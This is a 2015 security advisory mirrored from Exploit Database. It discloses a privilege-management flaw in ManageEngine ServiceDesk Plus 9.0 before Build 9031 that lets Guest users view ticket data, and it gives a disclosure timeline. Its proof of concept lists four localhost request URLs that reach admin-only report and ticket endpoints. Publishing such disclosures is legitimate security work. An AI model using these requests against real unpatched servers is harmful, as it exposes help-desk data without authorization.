ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management

• Exploit Database
• 51 阅读

• 作者： Rewterz - Research Group
  日期： 2015-01-26
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/35904/

• ================================================================================
  [REWTERZ-20140103] - Rewterz - Security Advisory
  ================================================================================
  
  Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
  Product: ServiceDesk Plus (http://www.manageengine.com/)
  Affected Version: 9.0 (Other versions could also be affected)
  Fixed Version: 9.0 Build 9031
  Vulnerability Impact: Low
  Advisory ID: REWTERZ-20140103
  Published Date: 22-Jan-2015
  Researcher: Muhammad Ahmed Siddiqui
  Email: ahmed [at] rewterz.com
  URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
  
  ================================================================================
  
  
  Product Introduction
  ===============
  
  ServiceDesk Plus is a help desk software with integrated asset and
  project management built on the ITIL framework. It is available in 29
  different languages and is used by more than 85,000 companies, across
  186 countries, to manage their IT help desk and assets.
  
  
  Source: http://www.manageengine.com/products/service-desk/
  
  
  Vulnerability Information
  ===================
  
  Class: Improper Privilege Management
  Impact: Low privileged user can access application data
  Remotely Exploitable: Yes
  Authentication Required: Yes
  User interaction required: Yes
  CVE Name: N/A
  
  
  Vulnerability Description
  ==================
  
  A user with limited privileges could gain access to certain
  functionality that is available only to administrative users. For
  example, users with Guest privileges can see the subjects of the
  tickets, stats and other information related to tickets.
  
  
  Proof-of-Concept
  =============
  
  http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
  
  http://127.0.0.1:8080/swf/flashreport.swf
  
  http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
  
  http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
  
  
  
  Timeline
  ======
  
  23-Dec-2014 – Notification to Vendor
  24-Dec-2014 – Response from Vendor
  30-Dec-2014 – Vulnerability fixed by Vendor
  
  
  About Rewterz
  ===========
  
  Rewterz is a boutique Information Security company, committed to
  consistently providing world class professional security services. Our
  strategy revolves around the need to provide round-the-clock quality
  information security services and solutions to our customers. We
  maintain this standard through our highly skilled and professional
  team, and custom-designed, customer-centric services and products.
  
  Revolutionizing Cybersecurity
  
  
  
  Complete list of vulnerability advisories published by Rewterz:
  
  http://www.rewterz.com/resources/security-advisories